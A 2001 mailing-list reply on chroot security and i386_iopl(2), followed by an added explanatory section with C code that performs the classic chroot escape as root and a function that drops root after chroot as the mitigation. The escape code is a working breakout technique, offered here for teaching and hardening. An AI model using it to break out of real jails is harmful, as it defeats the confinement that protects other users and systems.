From: gabriel rosenkoetter (greclipsed.net)
Date: Fri Jul 13 2001 - 07:28:13 CDT

    On Wed, Jul 11, 2001 at 10:18:05PM +1200, Dave Sainty wrote:
    > It occurs to me that one could theoretically (but not easily) jump out
    > of a chroot using i386_iopl(2) and related calls, possibly by
    > manipulating the hard drives, possibly some other way.
    >
    > Perhaps these functions (i386_iopl, i386_set_ioperm) should be
    > disabled for chrooted processes?
    >
    > A compile time option to disable them might be a good idea too?
    > (Regardless of what security level you run your kernel at)

    From i386_iopl(2):

    DESCRIPTION
         i386_iopl() sets the i386 I/O privilege level to the value specified by
         iopl. This call is restricted to the super-user.
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

    If a chrooted daemon is running as root, you've already lost. (That
    is, there are plenty of other ways for root to get out of a chroot
    jail.)

    -- 
           ~ g r  eclipsed.net
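The claim above, that a root process inside a chroot has "already lost", is worth seeing in working code. The following is an added example written for this page; it is not code from the original post, from NetBSD, or from the i386_iopl(2) manual. It is written against Linux/glibc (chroot(2), setuid(2), setgroups(2)), where the equivalent of i386_iopl(2) is iopl(2) and is likewise refused without CAP_SYS_RAWIO. The first function performs the classic escape: chroot() into a subdirectory while leaving the working directory outside the new root, walk ".." up to the real root, and chroot(".") there. The second function is the mitigation the reply implies: jail the daemon and then permanently give up root, so that chroot(2), iopl(2) and the rest of the super-user-only calls are refused for the life of the process. The scratch directory under /tmp, the "/var/empty" jail path and the uid/gid 65534 are assumptions made for the demo.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * Returns 1 if the process walked out of the chroot it created, 0 if the
 * kernel refused chroot(2) (EPERM for a non-root caller: the contained
 * case), and -1 on an unexpected error.  The directory names are
 * constructed for the demo.
 */
int try_chroot_escape(void)
{
    char outer[] = "/tmp/jaildemo.XXXXXX";   /* constructed scratch "jail" */
    char inner[64];
    int rc = -1;

    if (mkdtemp(outer) == NULL)
        return -1;
    snprintf(inner, sizeof inner, "%s/x", outer);
    if (mkdir(inner, 0700) != 0)
        goto cleanup;

    /* What a root daemon inside its jail can do: make a subdirectory and
     * chroot() into it while its cwd stays where it was, which is now
     * outside the new root. */
    if (chdir(outer) != 0)
        goto cleanup;
    if (chroot(inner) != 0) {
        rc = 0;                      /* refused; errno is EPERM unless root */
        goto cleanup;
    }

    /* Because the cwd is not under the new root, ".." is not clamped there
     * and walks all the way up to the real filesystem root; chroot(".")
     * then makes that the root again.  Nothing below can be undone from
     * here, so errors simply return -1. */
    for (int i = 0; i < 64; i++)
        if (chdir("..") != 0)
            return -1;
    if (chroot(".") != 0)
        return -1;

    /* The scratch directory resolves again only if the escape worked. */
    rc = (access(outer, F_OK) == 0) ? 1 : -1;

cleanup:
    if (chdir("/") != 0)
        rc = -1;
    rmdir(inner);
    rmdir(outer);
    return rc;
}

/*
 * The mitigation: after chroot(2) the daemon must stop being root.  This is
 * irreversible.  jail, uid and gid are the caller's choice (assumed here,
 * e.g. "/var/empty", 65534, 65534).  Returns 0 on success and -1 on failure,
 * including when asked to "drop" to uid 0.
 */
int confine_and_drop_root(const char *jail, uid_t uid, gid_t gid)
{
    /* The chdir("/") immediately after chroot() closes the cwd-outside-root
     * hole used by try_chroot_escape(). */
    if (chroot(jail) != 0 || chdir("/") != 0)
        return -1;
    if (setgroups(0, NULL) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    /* Verify the drop took: regaining root and re-chrooting must both fail. */
    if (setuid(0) == 0 || chroot("/") == 0) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(void)
{
    int r = try_chroot_escape();
    printf("uid %u: %s\n", (unsigned)getuid(),
           r == 1 ? "escaped the chroot (root in a jail is not contained)" :
           r == 0 ? "chroot(2) refused (not root, so the jail holds)" :
                    "unexpected error");
    /* Real daemon order: bind sockets and open logs as root, then
     * confine_and_drop_root("/var/empty", 65534, 65534), then serve. */
    return r < 0 ? 1 : 0;
}
```

Run it once as an unprivileged user and once as root (inside a throwaway container or VM, since it performs a real chroot): the unprivileged run reports that chroot(2) was refused, the root run reports the escape. Note that confine_and_drop_root() is only as good as the order of operations around it; anything that needs root (privileged ports, log files, the jail directory itself) has to be set up before the call, because nothing in the process can get root back afterwards.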